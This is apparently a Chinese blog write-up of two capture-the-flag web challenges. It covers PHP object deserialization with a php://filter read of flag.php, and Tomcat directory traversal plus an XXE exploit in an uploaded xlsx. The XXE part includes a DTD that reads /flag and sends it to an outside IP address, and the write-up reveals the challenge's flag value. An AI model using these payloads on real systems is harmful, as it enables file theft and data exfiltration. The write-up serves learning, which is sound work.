反序列化
题目源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81
| <?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op; protected $filename; protected $content;
function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); }
public function process() { if($this->op == "1") { $this->write(); } else if($this->op == "2") { $res = $this->read(); $this->output($res); } else { $this->output("Bad Hacker!"); } }
private function write() { if(isset($this->filename) && isset($this->content)) { if(strlen((string)$this->content) > 100) { $this->output("Too long!"); die(); } $res = file_put_contents($this->filename, $this->content); if($res) $this->output("Successful!"); else $this->output("Failed!"); } else { $this->output("Failed!"); } }
private function read() { $res = ""; if(isset($this->filename)) { $res = file_get_contents($this->filename); } return $res; }
private function output($s) { echo "[Result]: <br>"; echo $s; }
function __destruct() { if($this->op === "2") $this->op = "1"; $this->content = ""; $this->process(); }
}
function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; }
if(isset($_GET{'str'})) {
$str = (string)$_GET['str']; if(is_valid($str)) { $obj = unserialize($str); }
}
|
阅读源码后可以发现,这道题过滤的内容比较少,相对简单,但是我一开始还是没做出来,菜。
方法一:利用php7.1+特性,对属性类型不敏感,本地构造的时候把protected换成public构造即可。
O:11:”FileHandler”:3:{s:2:”op”;i:2;s:8:”filename”;s:8:”flag.php”;s:7:”content”;s:1:”t”;}
右键查看源码即可。
方法二:在利用php7.1+特性的基础上,利用php伪协议,php://filter/convert.base64-encode/resource=flag.php获取flag.php文件内容。
得到内容为PD9waHAgJGZsYWc9J2ZsYWd7YzI0NmJmMzEtOGM3Zi00M2FhLTliY2QtMGY2NDVlNTk2NWQxfSc7Cg==
然后base64解码即可。
<?php $flag=’flag{c246bf31-8c7f-43aa-9bcd-0f645e5965d1}’;
java file
这道题拿到手没什么思路,看了师傅们的wp继续做,知道了是目录穿越。
首先明白tomcat部署项目的文件结构:
部署在webapps文件夹下,其下每个文件夹代表一个项目。
classes文件夹下存放基本类,servlet等文件。
首先随便传个文件,发现了servlet的名字。
首先要获取web.xml文件,看看文件结构是怎样的,然后再把对应的东西下载下来
使用../不断返回上级目录,最后是/web.xml
payload:DownloadServlet?filename=../../../web.xml
下载下来之后发现了几个servlet文件,对应应该是classes/xxxx.servlet.class(注意前面还有包名)
下载servlet.class文件:payload:
?filename=../../../classes/cn/abc/servlet/UploadServlet.class
这样子把四个servlet下载下来,然后反编译阅读源码
这是下载的servlet,注意看过滤了flag,不能通过目录穿越直接穿越到根目录下载flag文件。
继续看上传servlet,
关键代码:
1 2 3 4 5 6 7 8 9 10
| if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) { try { Workbook wb1 = WorkbookFactory.create(in); Sheet sheet = wb1.getSheetAt(0); System.out.println(sheet.getFirstRowNum()); } catch (InvalidFormatException var20) { System.err.println("poi-ooxml-3.10 has something wrong"); var20.printStackTrace(); } }
|
这里可能存在XXE漏洞,遂测试。
excel文件需要以excel-开头。
由于是在buuoj复现,所以不可以用外网vps,只能用内网vps,用另外一个号再开一个ssh连着。。。卡了俩小时
XXE我也不是很了解,后续会继续学习。
这里跟着师傅们先复现:
大体思路就是xml文件加载外部实体,加载的外部实体里面会”包含”(我是这么理解的)本地flag文件,然后向vps发送一个请求,参数把flag文件带出去。
dtd文件:
1 2 3
| <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % all "<!ENTITY send SYSTEM 'http://174.1.87.39:8888/?%file;'>"> %all;
|
xml中新添加的内容:
1 2
| <!DOCTYPE data SYSTEM "http://174.1.87.39/1.dtd"> <data>&send;</data>
|
这里有个坑 就是在Windows系统下不要解压,直接修改后缀然后用360压缩在压缩文件内修改,再把扩展名改回去。
改好之后服务器监听端口,上传文件。
结束。
总结
XXE不太熟,需要再学习,目录穿越想到了,但是没成功利用,再有就是我看的目录结构看的是java web项目的目录结构,而不是tomcat部署的目录结构,所以也没利用成功。
-
Article Link
https://polosec.github.io/2020/05/15/%E7%BD%91%E9%BC%8E%E6%9D%AFweb-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/
-
Copyright Notice: All articles in this blog, unless otherwise stated, are under the CC BY 4.0 CN agreement.Reprint please indicate the source!